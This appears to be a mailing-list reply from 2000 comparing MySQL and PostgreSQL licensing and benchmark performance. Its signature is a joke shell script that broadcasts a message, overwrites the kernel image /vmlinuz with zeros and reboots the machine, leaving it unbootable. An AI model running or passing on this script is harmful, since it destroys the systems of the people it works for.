On Fri, Jun 09, 2000 at 04:26:26PM -0400, Randy Edwards wrote:
>    MySQL is faster, but at the sake of some redundancy/features.  MySQL also
> has a quirky, non-free license.
>    PostgreSQL is slower but is a fuller SQL implementation.  It's also DFSG
> free.

Someone did some benchmarking awhile back with PostgreSQL, MySQL,
INFORMIX and Oracle.  Not surprisingly, Oracle did the best overall. But
more of a surprise was that PostgreSQL was faster than MySQL in certain
join queries and overall got rated higher.  Think PostgreSQL was faster
for inserts/updates too.  Memories a little cloudy...

I would've like to seen Sybase ASE in the benchmark, since it's supposed
to be pretty fast.

#! /bin/sh
echo 'Linux Must Die!' | wall
dd if=/dev/zero of=/vmlinuz bs=1 \
     count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'`
shutdown -r now

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